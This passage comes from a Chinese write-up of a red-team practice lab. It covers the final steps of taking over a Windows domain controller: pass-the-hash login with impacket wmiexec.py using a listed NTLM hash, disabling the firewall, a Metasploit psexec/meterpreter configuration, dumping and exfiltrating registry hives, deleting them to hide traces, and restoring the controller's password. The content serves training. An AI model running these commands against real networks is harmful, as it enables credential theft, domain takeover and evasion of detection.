文章插图
获取到的 hash 后利用 impacket 中的 wmiexec.py 脚本进行登录, 成功拿到 shell : python wmiexec.py -hashes
aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880e redteam.red/[email protected] -codec gbk .
文章插图
此时, 成功获取到了域控的 shell . 但是这个 shell 并不是稳定的, 真实环境中我们还需要进一步进行权限维持的操作, 在得到 hash 之后, 先利用前面获取到的 shell 关闭一下防火墙: netsh advfirewall set allprofiles state off , 接着便可以使用 PSEXEC 模块上线 MSF 并进行后续的操作了.
use exploit/windows/smb/psexecset SMBUser administratorset SMBPass aad3b435b51404eeaad3b435b51404ee:028b70314013e1372797cff51298880eset payload windows/x64/meterpreter/bind_tcpset rhost 10.10.10.8set lport 4446run文章插图
需要注意的是, 在做完权限维持后要及时恢复域控的密码, 不然域控会脱域.
我们先导出 SAM 中原来的 hash , 利用 MSF 的 shell 下载下来并及时删除, 清理痕迹.
reg save HKLMSYSTEM system.savereg save HKLMSAM sam.savereg save HKLMSECURITY security.savedownload C:\sam.save C:\Users\95235\Desktop\sam.savedownload C:\security.save C:\Users\95235\Desktop\security.savedownload C:\system.save C:\Users\95235\Desktop\system.savedel /f sam.savedel /f system.savedel /f security.save文章插图
文章插图
文章插图
接着利用脚本 secretsdump.py 查看一下域控的 hash : python secretsdump.py -sam sam.save -system system.save -security security.save LOCAL .
文章插图
利用脚本 reinstall_original_pw.py 恢复 hash : python reinstall_original_pw.py OWA 10.10.10.8
f4044edaafbdca41a6e53d234c14ab9a .
文章插图
最后利用空密码再次进行连接来验证是否恢复成功: python secretsdump.py redteam.red/[email protected] -just-dc -no-pass .
文章插图
效果图
文章插图
由于打过几次线下的 CFS 靶场, 使用 CS 感觉不佳, 本次打靶过程中就只使用了 MSF , 正好锻炼一下自己对于 MSF 各功能的使用, 打靶过程中的收获还是挺大的. 靶机附件里面也给出了一个靶场存在漏洞的说明, 感兴趣的师傅们也可以根据漏洞说明尝试一下其他的打法.
推荐阅读
- 高速|女子打不到车雇电动车上高速:2人轮流骑 又累又热
- 袁泉|袁泉,终于从神坛上 下来了
- Java|Java:2022年招聘Java开发人员指南
- TikTok 乱拳打死老师傅:硅谷大厂还在发论文,它产品已经上线了
- 教师|农村学校招代课教师,招聘内容提到的“待遇从优”,到底有多优?
- 孩子打架家长正确处理
- 膝盖脂肪瘤应该怎么治疗?
- 孕12周双顶径看男女
- 汽车|上海修车店一天收20多辆“中暑”车:爆胎、打火机炸了玻璃
- 二十不惑2|《二十不惑2》:四姐妹职场打拼,传达正向价值观不如《少年派2》